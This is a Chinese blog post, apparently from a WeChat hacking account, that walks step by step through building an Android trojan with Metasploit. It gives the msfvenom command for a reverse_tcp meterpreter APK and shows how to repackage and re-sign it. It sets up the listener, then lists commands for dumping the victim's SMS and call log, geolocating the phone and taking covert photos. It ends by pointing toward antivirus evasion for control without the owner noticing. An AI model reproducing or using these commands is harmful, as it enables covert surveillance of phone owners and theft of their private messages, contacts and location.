MSF获取安卓手机权限
MSF获取安卓手机权限,这里只是简单演示一下如何使用MSF获取手机权限,实际上msf生成的木马早都被收录到特征库了,一旦安装系统就会提示你病毒阻止你安装。并且安装的木马基本没什么权限就只能看看系统信息这些,其他的权限需要重新授予
01
—
msfveom生成apk木马
查看kali的IP,注意这里手机或电脑需要在同一网络中,不然的话就只能将kali映射到公网上才能获取到shell
使用msfveom生成木马
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.41 lport=4444 R>shell.apk
02
—
反编译更改版本信息
下载安装可能遇到版本过低问题
下载apktool进行反编译,官方网址是:https://ibotpeaches.github.io/Apktool/
java -jar apktool_2.7.0.jar d -f shell.apk(你的apk的名称) -o shell
运行后会将apk反编译并存放在shell目录中
打开apktiil.yml更改版本信息,这里将minSdkVersion改为了16,将targetSdkVersion:改为了23
接着,要重新打包生成未签名的包 ,输入命令
java -jar apktool_2.10.0.jar b shell -o shella.apk
此时的apk文件由于还没有签名,还不能下载运行,所以要进行签名,这里使用的是java自带的标准库keytool先来生成签名证书,输入命令,内容随便填写记住自己设置的密钥
keytool -genkeypair -alias sss -keyalg RSA -validity 100 -keystore sss.jks
最后对apk文件进行签名,输入前面设置的密钥口令
jarsigner -verbose -keystore sss.jks -signedjar thomas.apk shella.apk sss
03
—
获取shell
打开msfconsole,配置监听
msf6 > use exploit/multi/handler
Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
payload => android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.2.41
LHOST => 192.168.2.41
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > run
下载刚刚生成thoms.apk并运行,注意这个木马已经被很多厂商收录到病毒库了,所以基本都是会报毒的需要自己授权安装下
此时msf成功创建会话
下面是控制android的一些命令,输入命令help,可以查看帮助文档,获取更多功能
1.查看对方手机的短信
dump_sms
2.获取对方手机的GPS定位
geolocate
3.查看对方手机的通讯录
dump_calllog
4.查看对方手机安装了哪些app
app_list
5.远程控制对方手机拍摄一张照片
webcam_snap
6.查看对方手机信息
sysinfo
此时的应用拥有的权限非常的少,其他需要你重新授权
这里重新加了一个读取短信的权限,输入命令dump_sms获取手机的短信
打开txt文件查看手机的短信
这里纯意淫一下,要想深入利用还是要考虑免杀和绕过在无感知下完全控制手机
<<< END >>>
原创文章|转载请附上原文出处链接
更多工具|关注作者查看
作者|混子Hacker
原文始发于微信公众号(混子Hacker):【渗透实战】MSF控制安卓手机
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论